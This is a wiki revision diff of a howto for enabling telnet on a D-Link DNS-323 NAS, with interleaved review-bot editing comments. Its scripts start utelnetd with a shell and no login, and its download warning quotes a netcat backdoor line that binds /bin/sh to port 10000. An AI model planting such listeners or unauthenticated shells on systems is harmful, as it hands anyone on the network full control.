Differences
This shows you the differences between the selected revision and the current version of the page.
howto:telnet 2008/05/12 22:10 | howto:telnet 2017/09/06 18:38 current | ||
---|---|---|---|
Line 1: | Line 1: | ||
====== Enabling Telnet ====== | ====== Enabling Telnet ====== | ||
- | Before you even try this, please be :!: **WARNED** :!: that using telnet to your DNS-323 you can very easily <hi #ffff00>[[wp>bricked|brick]]</hi> your unit. | + | Before you even try this, please be :!: **WARNED** :!: that using telnet to your DNS-323 you can very easily [[wp>bricked|brick]] your unit. |
+ | |||
+ | |||
+ | |||
+ | |||
+ | ===== Enabling Telnet without modifying the firmware ===== | ||
+ | An easy way to enable Telnet without modifying your firmware is to install Fonz funplug. (More info [[http://wiki.dns323.info/howto:ffp|here]]). You can rollback your changes (and remove telnet access) later on by simply removing Fonz funplug files and reboot. | ||
+ | |||
+ | It is commonly accepted that you can't harm your device this way (you still should know what you do when using telnet). | ||
+ | |||
+ | Be aware that anyone can login with the username "nobody" with no password. Also true using "admin" and no password if you have not set up a password for the admin web page. For best results just use telnet to enable ssh and disable telnet after that. | ||
+ | |||
+ | ===== Modified firmware with telnet access ===== | ||
+ | I ([[http://pedro.larroy.com|piotr]]) used [[howto:custom_firmware|Helge's instructions to build firmwares]] in order to modify Dlink's firmware version 1.05. Currently it adds telnet access on port 23 **without password authentication**. You can download and reflash via the web interface. Only telnet is added, the rest of the firmware functionality is left intact. | ||
+ | |||
+ | This allows you to do filesystem checks since running telnet from the ramdisk allows the raid/hard disks to be umounted, just umount them and run e2fsck.\\ | ||
+ | |||
+ | \\ | ||
+ | [[http://pedro.larroy.com/files/FrodoII-firmware|modified DNS323 1.05 firmware with telnet access]]\\ | ||
+ | [[http://pedro.larroy.com/files/FrodoII-firmware.md5sum|md5]]\\ | ||
+ | |||
+ | Instructions:\\ | ||
+ | * Check the md5sum of the firmware you downloaded. (The firmware also embedded CRC, but better safe than sorry). | ||
+ | * Reflash your DNS323 using the web interface | ||
+ | * Wait at least **3 minutes** to be sure the unit is reflashed correctly | ||
+ | * If you enter via web interface and see the option to recreate the raid again, just **reboot** the unit with the power button so the old raid is recognised and run again. | ||
+ | * Now you can operate as normal, but port 23 should be open with telnet access | ||
+ | |||
+ | I like this method better than running as fun_plug since the latter causes the FS not to be cleanly umounted, leading to filesystem corruption over time. Dlink's firmware is really crappy, and doesn't check the filesystem. I have informed Dlink about this fact. | ||
+ | |||
+ | You should be able to go back to an official firmware using the web interface update. | ||
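Review bot: the md5 step in the new Instructions list ("Check the md5sum of the firmware you downloaded") only detects a corrupted download, because the checksum file is linked from the same plain-http host as the firmware image, so whoever can replace one can replace the other. Say so in that bullet and consider publishing a stronger hash through a second channel. The modified-firmware paragraph also states that port 23 is open "without password authentication" but, unlike the funplug section above it, gives no advice on limiting that exposure; repeat the "use telnet to enable ssh and disable telnet after that" recommendation there.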
Line 19: | Line 49: | ||
# Uncomment next line if you want "proof of concept". | # Uncomment next line if you want "proof of concept". | ||
# A filem dmesg.out will be located on \\NAS\HDD_1 or | # A filem dmesg.out will be located on \\NAS\HDD_1 or | ||
- | # \\NAS\Volume_1 depnding on firmware version. | + | # \\NAS\Volume_1 depending on firmware version. |
# | # | ||
# dmesg > /mnt/HD_a2/dmesg.out | # dmesg > /mnt/HD_a2/dmesg.out | ||
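Review bot: the spelling fix on the \\NAS\Volume_1 comment leaves "A filem dmesg.out" on the line above it unchanged; correct "filem" to "file" in the same edit.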
Line 29: | Line 59: | ||
</code> | </code> | ||
+ | <code bash> | ||
+ | # | ||
+ | # The contents of starttelnet.sh itself | ||
+ | /mnt/HD_a2/lnx_bin/busybox3 mknod /dev/ptyp0 c 2 0 | ||
+ | /mnt/HD_a2/lnx_bin/busybox3 chmod 0666 /dev/ptyp0 | ||
+ | /mnt/HD_a2/lnx_bin/busybox3 mknod /dev/ttyp0 c 3 0 | ||
+ | /mnt/HD_a2/lnx_bin/busybox3 chmod 0666 /dev/ttyp0 | ||
+ | |||
+ | rm /mnt/HD_a2/lnx_bin/sh | ||
+ | ln -s /mnt/HD_a2/lnx_bin/busybox3 /mnt/HD_a2/lnx_bin/sh | ||
+ | /mnt/HD_a2/lnx_bin/utelnetd -l /mnt/HD_a2/lnx_bin/sh -d | ||
+ | </code> | ||
+ | |||
+ | Please take note that this is the minimal setup required to have Telnet enabled on the DNS-323. The minimal setup using this starttelnet.sh has a one major drawback that it operates directly from the installed HDD. This will prevent the filesystem from being unmounted which makes file system checks or the normal RAID rebuild procedure (automatic or manual from the web interface) impossible. The HDDs will still go to power save, though. | ||
+ | |||
+ | This will become a problem when the filesystem becomes corrupted, due to a power outage or other errors. | ||
+ | |||
+ | With Telnet running from the HDD filesystem, we cannot unmount /dev/md0 and therefore cannot run fsck /dev/md0, but we cannot run Fsck without Telnet, obviously. But we can copy the needed components to the RAMdisk and run Telnet from there: | ||
+ | |||
+ | <code bash> | ||
+ | # improved starttelnet.sh, enabling the filesystems to be unmounted and checked, if need be. | ||
+ | |||
+ | # copy the provided components to a directory on the ramdisk | ||
+ | # the ramdisk is regenerated with every boot, so the copy has no lasting effects at all | ||
+ | # simply copy the two files over | ||
+ | cp /mnt/HD_a2/lnx_bin/utelnetd /sbin/utelnetd | ||
+ | cp /mnt/HD_a2/lnx_bin/busybox3 /bin/busybox3 | ||
+ | |||
+ | # create the terminal device as usual | ||
+ | /bin/busybox3 mknod /dev/ptyp0 c 2 0 | ||
+ | /bin/busybox3 chmod 0666 /dev/ptyp0 | ||
+ | /bin/busybox3 mknod /dev/ttyp0 c 3 0 | ||
+ | /bin/busybox3 chmod 0666 /dev/ttyp0 | ||
+ | |||
+ | # make a shell link on the ramdisk | ||
+ | mkdir /bin/busybox3.dir/ | ||
+ | PATH="$PATH:/bin/busybox3.dir" | ||
+ | |||
+ | ln -s /bin/busybox3 /bin/busybox3.dir/sh | ||
+ | |||
+ | # and start the Telnet service from the ramdisk as well | ||
+ | /sbin/utelnetd -l /bin/busybox3.dir/sh -d | ||
+ | |||
+ | </code> | ||
+ | |||
+ | Now you can connect via Telnet and perform fsck without getting the error message "/dev/md0 is busy". (Note: samba is still sharing the HDD for your network, also preventing the HDD from being unmounted - but smb can be safely stopped or started from the Telnet console by issuing "smb stop" or "smb start".) | ||
+ | |||
+ | Updated 2009/12/06: The line <code>ln -s /bin/busybox3 /bin/busybox3.dir/sh</code> was missing from the above script. | ||
===== Download Telnet ===== | ===== Download Telnet ===== | ||
- | Next step is to dowload the files required. [[http://forum.dsmg600.info/profile.php?id=47|KRH]] kindly provided them for us and you can now download them from here: {{:howto:utelnet-kit.tar.gz}}. For Windows Users: :!: Dont use WinZIP - try WinRAR instead :!: | + | **WARNING** Be careful what you download. Some copies of fun_plug contain backdoors like using nc (netcat) to allow unauthenticated access to port 10000. Running netcat like this may cause the unmount problems described above. |
+ | E.g. | ||
+ | /mnt/HD_a2/nc -l -p 10000 -e /bin/sh & | ||
+ | |||
+ | Next step is to dowload the files required. [[http://dns323.kood.org/forum/profile.php?id=47|KRH]] kindly provided them for us and you can now download them from here: {{:howto:utelnet-kit.tar.gz}}. For Windows Users: :!: Dont use WinZIP - try 7-Zip or WinRAR instead :!: | ||
From this file, extract the following files: | From this file, extract the following files: | ||
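Review bot: both starttelnet.sh variants end with utelnetd -l pointing at the busybox sh link, so every connection to the telnet port is handed a shell with no login step, yet the paragraph after the first script names HDD unmounting as the "one major drawback" and never mentions this. State it next to the scripts. In the Download Telnet text, the new WARNING about backdoored fun_plug copies gives readers no way to check the utelnet-kit.tar.gz linked in the next paragraph; add a checksum for the kit, put the nc example in a code block, and say that a line of that form in a downloaded fun_plug is what to look for. "dowload" and "Dont" in the rewritten sentence are still misspelled.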
Line 38: | Line 120: | ||
* utelnetd | * utelnetd | ||
* busybox3 | * busybox3 | ||
- | |||
===== Installing Telnet ===== | ===== Installing Telnet ===== | ||
- | When all files are extracted you need to install them. This can be achieved in several ways covered in the [[fun_plug]] howto. The most important is that the files resides on the first disc and in the following structure and that they have rights to //execute//. | + | When all files are extracted you need to install them. This can be achieved in several ways covered in the [[fun_plug]] howto. The most important is that the files reside on the first disc and in the following structure and that they have rights to //execute//. |
<code bash> | <code bash> | ||
Line 62: | Line 143: | ||
So; now you have a telnet access and want to do something with it. Maybe a [[chroot_debian|debian]] Sarge chroot system. Upgrade your [[firefly|iTunes server]] or make your ftp server working in a [[open_ports_ftpd|NAT]]'ed environment. You can even set-up your own [[wp>Web_server|WEB server]] using [[howto:lighttpd_php|lighttpd]]. | So; now you have a telnet access and want to do something with it. Maybe a [[chroot_debian|debian]] Sarge chroot system. Upgrade your [[firefly|iTunes server]] or make your ftp server working in a [[open_ports_ftpd|NAT]]'ed environment. You can even set-up your own [[wp>Web_server|WEB server]] using [[howto:lighttpd_php|lighttpd]]. | ||
- | But remember, always have //fun//, ;-), and be aware that you're now in a position where you can easily <hi #ffff00>[[wp>bricked|brick]]</hi> your unit. | + | But remember, always have //fun//, ;-), and be aware that you're now in a position where you can easily [[wp>bricked|brick]] your unit. |
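Review bot: the closing reminder still warns only about bricking, while the context line above it points readers at web-server and NAT'ed ftp setups with the telnet service from this page still running; add a sentence here repeating the first section's advice to enable ssh and then disable telnet.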